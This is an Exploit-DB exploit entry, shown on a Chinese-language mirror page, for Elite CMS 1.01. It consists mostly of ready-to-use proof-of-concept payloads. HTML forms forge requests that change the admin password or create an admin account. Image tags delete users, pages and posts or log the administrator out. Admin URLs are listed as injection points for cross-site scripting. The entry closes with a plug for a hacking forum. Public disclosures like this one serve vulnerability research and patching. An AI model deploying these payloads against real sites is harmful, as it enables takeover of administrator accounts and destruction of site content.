Elite CMS 1.01 – Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities

  • 作者: 10n1z3d
    日期: 2010-07-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14318/
  • # Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities
    # Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    # Date: Sat 10 Jul 2010 08:05:44 PM EEST 
    # Vendor: http://elitecms.net/
    # Download: http://elitecms.net/download.php?download=eliteCMS
    
    -=[ CSRF PoC 1 - Change Admin Password ]=-
    
    <html>
    <head>
    <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Change Admin Password</title>
    </head>
    <body>
    <!--- Edit these --->
    <form action="http://[domain]/admin/edit_user.php?user=1" method="post">
    <input type="hidden" name="password" value="pwned" />
    <input type="hidden" name="email" value="pwn@pwned.com" />
    <input type="hidden" name="first_name" value="pwned" />
    <!--- Do not edit below --->
    <input type="hidden" name="s_admin" value="1" />
    <input type="hidden" name="active" value="1" />
    <!--- At least they check this --->
    <input type="submit" name="submit" value="Continue" />
    </form>
    </body>
    </html>
    
    -=[ CSRF PoC 2 - Create Admin User ]=-
    
    <html>
    <head>
    <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Create Admin User</title>
    </head>
    <body>
    <!--- Edit these --->
    <form action="http://[domain]/admin/new_user.php" method="post">
    <input type="hidden" name="user_name" value="root" />
    <input type="hidden" name="password" value="root" />
    <input type="hidden" name="email" value="root@root.com"/>
    <input type="hidden" name="first_name" value="root"/>
    <!--- Do not edit below --->
    <input type="hidden" name="s_admin" value="1" />
    <input type="hidden" name="active" value="1" />
    <!--- At least they check this --->
    <input type="submit" name="submit" value="Continue" />
    </form>
    </body>
    </html>
    
    -=[ CSRF PoC 3 - Delete User ]=-
    
    <img src="http://[domain]/admin/delete_user.php?user=2" alt="Do you see this?" />
    
    -=[ CSRF PoC 4 - Delete Page ]=-
    
    <img src="http://[domain]/admin/delete_page.php?page=1" alt="Do you see this?" />
    
    -=[ CSRF PoC 5 - Delete Post ]=-
    
    <img src="http://[domain]/admin/delete_post.php?post=1" alt="Do you see this?" />
    
    -=[ CSRF PoC 6 - Logout The Administrator ]=-
    
    <img src="http://[domain]/admin/logout.php" alt="Do you see this?" />
    
    -=[ XSS ]=-
    
    http://[domain]/admin/edit_page.php?page=1[XSS]
    http://[domain]/admin/edit_post.php?page=1[XSS]
    http://[domain]/admin/add_post.php?page=1[XSS]
    
    Also all of the text fields in the administration panel accept xss code.
    
    
    Not so l33t huh?
    Visit us at http://www.evilzone.org/.